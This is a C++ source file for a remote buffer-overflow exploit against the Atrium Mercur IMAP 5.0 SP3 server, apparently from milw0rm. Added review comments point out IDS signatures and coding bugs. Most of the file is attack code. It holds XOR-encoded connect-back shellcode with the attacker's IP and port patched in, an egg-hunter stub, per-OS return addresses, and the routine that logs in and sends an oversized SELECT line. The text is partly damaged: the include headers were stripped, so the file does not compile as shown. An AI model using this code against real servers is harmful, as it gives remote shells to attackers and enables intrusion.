/*
 * mercur.cpp
 *
 * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
 * Copyright (C) 2006 Javaphile Group
 * http://www.javaphile.org
 *
 * Exploits code by : pll Ellison.Tang[at]gmail[dot]com
 *
 * Bug Reference:
 * http://www.frsirt.com/bulletins/4332
 *
 */

/*
 * NOTE(review): this is a Win32/Winsock proof-of-concept for the bulletin
 * cited above. From a defender's point of view the observable traffic is:
 * an IMAP LOGIN line followed by a SELECT whose mailbox argument is ~1000
 * bytes of mostly 0x41 ('A') with a binary tail -- an easy network-IDS
 * signature. The return-address table in main() is per-OS, so the payload
 * only functions against the listed builds (and the "Debug" entry is a
 * deliberately invalid 0xDDDDDDDD marker).
 *
 * NOTE(review): the header names after each #include were lost in
 * extraction (only the directive survived); which headers the original
 * pulled in cannot be recovered from this page. The file as shown does
 * not compile.
 */
#include
#include
#include
#include
#pragma comment(lib, "ws2_32")

/*
 * Resolve `ip` (name or dotted quad), open a TCP connection to `port` and
 * return the connected socket with a receive timeout set. Every failure
 * path prints a message and calls exit(-1); the function never returns an
 * invalid socket to the caller.
 *
 * NOTE(review): WSAStartup() is called here on every invocation and is only
 * undone by Disconnect(); the exit(-1) paths below never call WSACleanup().
 */
SOCKET ConnectTo(char *ip, int port)
{
    WSADATA wsaData;
    SOCKET s;
    struct hostent *he;
    struct sockaddr_in host;
    // Receive timeout handed to SO_RCVTIMEO (on Winsock this is milliseconds, i.e. 150 s).
    int nTimeout=150000;
    if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
    {
        printf("[-]WSAStartup failed.\n");
        exit(-1);
    }
    if((he=gethostbyname(ip))==0)
    {
        printf("[-]Failed to resolve '%s'.", ip);
        exit(-1);
    }
    // `host` is never zeroed (sin_zero stays uninitialised); harmless for connect() but untidy.
    host.sin_port=htons(port);
    host.sin_family=AF_INET;
    // NOTE(review): he->h_addr (h_addr_list[0]) is not checked for NULL before it is dereferenced.
    host.sin_addr=*((struct in_addr *)he->h_addr);
    // NOTE(review): SOCKET is an unsigned type on Windows, so `< 0` can never be true;
    // the documented failure sentinel is INVALID_SOCKET. In practice a failed socket()
    // still falls through to connect(), which then fails and exits below.
    if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
    {
        printf("[-]Failed creating socket.");
        exit(-1);
    }
    // connect() reports failure as SOCKET_ERROR (-1), so this comparison does work.
    if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
    {
        closesocket(s);
        printf("[-]Failed connecting to host.\n");
        exit(-1);
    }
    // Return value of setsockopt() is ignored; a failure here only means recv() may block indefinitely.
    setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
    return s;
}

/* Close the socket opened by ConnectTo() and release Winsock. */
void Disconnect(SOCKET s)
{
    closesocket(s);
    WSACleanup();
}

/*
 * Dump `len` bytes of `sc` to stdout as a C string literal ("\xNN..."),
 * 16 bytes per line, lower-case hex, terminated by `";`. Not called
 * anywhere in this file -- a leftover development helper.
 *
 * NOTE(review): `_tolower` is a non-standard name (tolower() is the
 * portable call), and isupper() is fed a plain `char` rather than an
 * `unsigned char`. `msg` holds the 4-character "\xNN" plus NUL, so the
 * 6-byte buffer is sufficient for sprintf().
 */
void PrintSc(unsigned char *sc, int len)
{
    int i,j;
    char *p;
    char msg[6];
    //printf("/* %d bytes */\n", buffsize);
    // Print general shellcode
    for(i = 0; i < len; i++)
    {
        // Start a new quoted line every 16 bytes (first line gets just the opening quote).
        if((i%16)==0)
        {
            if(i!=0) printf("\"\n\"");
            else printf("\"");
        }
        //printf("\\x%.2X", sc[i]);
        sprintf(msg, "\\x%.2X", sc[i] & 0xff);
        // Re-emit the escape with the hex digits folded to lower case.
        for( p = msg, j=0; j < 4; p++, j++ )
        {
            if(isupper(*p)) printf("%c", _tolower(*p));
            else printf("%c", p[0]);
        }
    }
    printf("\";\n");
}

/*
 * Entry point. Expected argv: [1] target host, [2] and [3] the address and
 * port patched into the payload (variables are named dwCbIp/dwCbPort, so
 * presumably a connect-back), [4] index into the os[] table. The usage text
 * below lost its argument placeholders in extraction.
 *
 * Flow: connect to port 143, check the banner for "MERCUR", read
 * username/password from stdin, send a LOGIN line, then send the oversized
 * SELECT argument built in szMagicData.
 *
 * NOTE(review): `void main` is non-standard; `return;` is used for every
 * early exit and the socket is only closed on the success path.
 */
void main(int argc,char* argv[])
{
    // Per-target return address plus a human-readable label; terminated by a {0, NULL} entry.
    struct OSTYPE
    {
        unsigned int ret;
        char des[255];
    };
    OSTYPE os[] =
    {
        {0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
        {0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
        {0xDDDDDDDD, "Debug"},
        {0, NULL}
    };

    // Payload: a 21-byte decoder stub followed by a body XOR-encoded with 0xEE.
    // The two positions marked //ip and //port below are overwritten at runtime
    // (indices 92-95 and 99-100), so the encoded address and port must also be
    // XORed with 0xEE before being stored (see dwCbIp/dwCbPort handling).
    unsigned char shellcode[]=
    /* ip offset: 71 + 21 = 92 */
    /* port offset: 78 + 21 = 99 */
    /* 21 bytes decode */
    "\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
    "\xe8\xed\xff\xff\xff"
    /* 254 bytes shellcode, xor with 0xee */
    "\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
    "\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
    "\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
    "\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
    "\x84\xec\x11\xb8\xfe\x7d\x86"
    "\x91\xee\xee\xef" //ip
    "\x86"
    "\xec\xee"
    "\xee\xdb" //port
    "\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
    "\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
    "\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
    "\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
    "\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
    "\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
    "\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
    "\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
    "\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
    "\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
    "\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

    // 91-byte stub (plus NUL) placed immediately before the "\r\n" at offset 251
    // of szMagicData. Bytes 85-88 (the four 0x90s) are overwritten below with the
    // return address selected from os[].
    unsigned char FindSc[]=
    "\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B"
    "\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50"
    "\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74"
    "\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7"
    "\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01"
    "\x04\x13\x33\xC0\xC3"
    "\x90\x90\x90\x90"
    "\xEB\xA5";

    // Usage text. The argument placeholders after %s were stripped in extraction.
    if(argc < 5)
    {
        printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n");
        printf("-------------------------------------------\n");
        printf("Usage:\n");
        printf(" %s \n", argv[0]);
        printf("\nType could be:\n");
        int i=0;
        while(os[i].ret)
        {
            printf(" [%d] %s\n", i, os[i].des);
            i++;
        }
        return;
    }

    // ConnectTo() exits the process itself on any failure.
    SOCKET s=ConnectTo(argv[1],143);
    printf("[+]Connected to target...");

    // NOTE(review): recv() does not NUL-terminate. The buffer starts zeroed, but a
    // full 600-byte read leaves no terminator and strstr() below would run past it.
    // Later recv() calls reuse the buffer without clearing it, so stale bytes from
    // the banner can satisfy the "OK" check.
    char szRecvBuff[600] = {0};
    if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
    {
        printf("failed!\n");
        return;
    }
    else
    {
        printf("done!\n");
    }
    // printf("%s\n",szRecvBuff);
    // Banner fingerprint; anything without "MERCUR" in the greeting is rejected.
    if(strstr(szRecvBuff, "MERCUR") == NULL)
    {
        printf("[-]Seems not IMAP running.\n");
        printf("Quiting...");
        return;
    }
    else
    {
        printf("[*]Seems IMAP running.\n");
    }

    // Address/port are XOR-masked with 0xEE so they survive the payload's decoder.
    // inet_addr() returns INADDR_NONE on a malformed string; that is not checked.
    unsigned long dwCbIp=inet_addr(argv[2]);
    unsigned short q=(unsigned short)atoi(argv[3]);
    unsigned short dwCbPort=(unsigned short)q;
    dwCbIp=dwCbIp^0xEEEEEEEE;
    dwCbPort=dwCbPort^0xEEEE;
    // Address bytes are stored in the order inet_addr() produced them (network order).
    shellcode[92] =(char) (dwCbIp & 0x000000FF);
    shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
    shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
    shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);
    // Port is stored high byte first (network order).
    shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
    shellcode[100] =(char) (dwCbPort & 0x000000FF);

    // NOTE(review): gets() is unbounded -- any input of 20 or more characters
    // overflows these stack buffers in the tool itself. fgets() with sizeof is
    // the bounded equivalent.
    char szUserName[20]={0};
    printf("[?]Username:");
    gets(szUserName);
    char szPassWord[20]={0};
    printf("[?]Passwd:");
    gets(szPassWord);

    // Builds "<user> login <pass> <pass>\r\n". In IMAP the first token is the
    // command tag, so the username entered acts as the tag and the password
    // string fills both the user and password fields -- presumably intended by
    // the author; verify against the original.
    //
    // NOTE(review): szLoginInfo is 50 bytes but the pieces can total
    // 19 + 7 + 19 + 1 + 19 + 2 = 67 even when the inputs fit their own buffers,
    // so long credentials overflow it.
    char szLogin[]=" login ";
    char szLoginInfo[50]={0};
    unsigned char szSpace=0x20;
    char szEnd[]="\r\n";
    memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
    int dwLen=lstrlen(szUserName);
    memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
    dwLen+=lstrlen(szLogin);
    memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
    dwLen+=lstrlen(szPassWord);
    memcpy(szLoginInfo+dwLen,&szSpace,1);
    dwLen++;
    memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
    dwLen+=lstrlen(szPassWord);
    memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));
    // printf("%s\n",szLoginInfo);
    // Credentials go over the wire in clear text; send() result is not checked.
    printf("[+]Sending Login Info...");
    send(s,szLoginInfo,lstrlen(szLoginInfo),0);
    if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
    {
        printf("failed!\n");
        return;
    }
    else
    {
        printf("done!\n");
    }
    // printf("%s\n",szRecvBuff);
    // Loose success check: any "OK" anywhere in the (possibly stale) buffer passes.
    if(strstr(szRecvBuff, "OK") == NULL)
    {
        printf("[-]Seems not a valid user or not support IMAP.\n");
        printf("Quiting...");
        return;
    }
    else
    {
        printf("[*]Seems a valid user.\n");
    }

    // Assemble the 1000-byte SELECT line: "<user> select " then 'A' filler, with
    // FindSc ending at offset 251, "\r\n" at 251, two "AGOU" markers at 253/257,
    // the payload at 261 and a final "\r\n" at 998. The last byte stays NUL and is
    // not sent (sizeof - 1).
    char szSelect[]=" select ";
    char szMagicData[1000]={0};
    memset(szMagicData,'A',sizeof(szMagicData)-1);
    memcpy(szMagicData,szUserName,lstrlen(szUserName));
    memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);
    // NOTE(review): p is not range-checked; a bad argv[4] reads past os[] (or the
    // {0, NULL} terminator) and atoi() returns 0 for non-numeric input.
    int p=atoi(argv[4]);
    // NOTE(review): unaligned 4-byte store through a cast char pointer -- works on
    // x86/MSVC but is a strict-aliasing/alignment violation in portable C/C++.
    *(unsigned int *)&FindSc[85] = os[p].ret;
    memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);
    memcpy(szMagicData+251,szEnd,sizeof szEnd-1);
    char szAdog[]="AGOU";
    memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
    memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
    memcpy(szMagicData+261,shellcode,sizeof shellcode-1);
    memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);
    printf("[+]Sending Magic Data To server...Good Luck!\n");
    send(s,szMagicData,sizeof szMagicData-1,0);
    // Final recv() result is ignored and the buffer is printed as-is (may be stale, see above).
    recv(s,szRecvBuff,sizeof(szRecvBuff),0);
    printf("%s\n",szRecvBuff);
    Disconnect(s);
    printf("[?]Sending finished...Good luck!\n");
}

// milw0rm.com [2006-03-19]